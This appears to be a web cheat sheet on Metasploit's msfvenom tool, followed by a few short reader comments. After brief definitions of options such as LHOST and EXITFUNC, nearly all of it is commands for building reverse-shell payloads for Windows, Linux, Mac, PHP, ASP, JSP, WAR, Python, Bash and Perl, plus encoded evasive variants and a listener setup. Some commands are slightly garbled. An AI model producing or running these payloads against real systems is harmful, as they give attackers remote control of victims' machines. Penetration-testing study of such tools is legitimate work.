Msfvenom All in One cheatsheet
One of the most powerful utilities of Metasploit is its payload module. Its abilities are underutilized ( by the beginners ) mostly, due to lack of awareness. So to solve this for once and for all let’s see how we can make payloads for any platform in any situation.
A strong foundation is necessary for a strong and steady building. So, before the fun part let’s take a look at few much needed basic terminologies that will be required to make the payloads.
LHOST: IP address to open the listener on. It’s required to make a connection to the target machine. If you are on the same network then it’s your LAN IP if you are performing the attack over the internet then it’s your WAN IP.
LPORT: Again it’s one of your ports through which the connection will be made. Here you can give any random open port accordingly.
RHOST: IP of the target system.
RPORT: It’s the port on which the service is running that you are exploiting. Mostly it is preset in the exploits and scanner scripts.
SRVHOST: this option refers to the IP address of your current computer (i.e. the one you are using to execute the attack).
SRVPORT: this option refers to the port you will use for the exploitation
URIPATH: this refers to the text you’ll place in the end section of your chosen URI
PAYLOAD: Is the shellcode that’s gonna give you the reverse shell.
EXITFUNC:– This option effectively sets a function hash in the payload that specifies a DLL and function to call when the payload is complete.
There are 4 different values for EXITFUNC:
- None
- SEH
- Thread
- Process
Usually, it is set to thread or process, which corresponds to the ExitThread or ExitProcess calls. “none” technique will call GetLastError, effectively a no-op. The thread will then continue executing, allowing you to simply cat multiple payloads together to be run in serial.
EXITFUNC will be useful in some cases where after you exploited a box, you need a clean exit, even, unfortunately, the biggest problem is that many payloads don’t have a clean execution path after the EXITFUNC ? .
SEH | This method should be used when there is a structured exception handler (SEH) that will restart the thread or process automatically when an error occurs. |
THREAD | This method is used in most exploitation scenarios where the exploited process (e.g. IE) runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit) |
PROCESS | This method should be used with multi/handler. This method should also be used with any exploit where a master process restarts it on exit. |
NOTE- Sometimes its importent to understand the senario of your system for example if your system is based on 32 bit architechure then you need to follow some certain switches from msfvenom for example :-
msfvenom -a x86 -p < your payload > LHOST= < your ip > LPORT= < your port > -f exe , elf , python
Now let’s take a look at some basic MSFVENOM commands we will be using:
List payloads
msfvenom -l |
Binaries
Windows Staged reverse TCP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= <Your IP Address> LPORT=4242 -f exe > reverse.exe
Windows Stageless reverse TCP
msfvenom -p windows/shell_reverse_tcp LHOST= <Your IP Address> LPORT=4242 -f exe > reverse.exe
Linux Staged reverse TCP
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= <Your IP Address> LPORT=4242 -f elf >reverse.elf
Linux Stageless reverse TCP
msfvenom -p linux/x86/shell_reverse_tcp LHOST= <Your IP Address> LPORT=4242 -f elf >reverse.elf
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho |
Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php |
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp |
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp |
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war |
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py |
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh |
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl |
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language> |
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language> |
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language> |
Generate encoded payloads
Shikata_ga_nai
msfvenom -p -e shikata_ga_nai -i 5 -f raw > reverse msfvenom windows/exec cmd=calc.exe -e x86/alpha_mixed -t -v -a windows –platform window |
EXITFUNC reverse TCP
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR IP> LPORT=<YOUR PORT> EXITFUNC=seh -e x86/shikata_ga_nai -b “\x00\x0a\x0d\x20” -i 2 |
EXITFUNC meterpreter reverse TCP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= <YOUR IP> LPORT= <YOUR PORT> EXITFUNC=seh -e x86/shikata_ga_nai -b “\x00\x0a\x0d\x20” -i 2 |
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit -j -z |
References :-
Great article! We are linking to this great post on our website.
Keep up the good writing.
Excellent site. Lots of useful info here.
thanks for the useful info!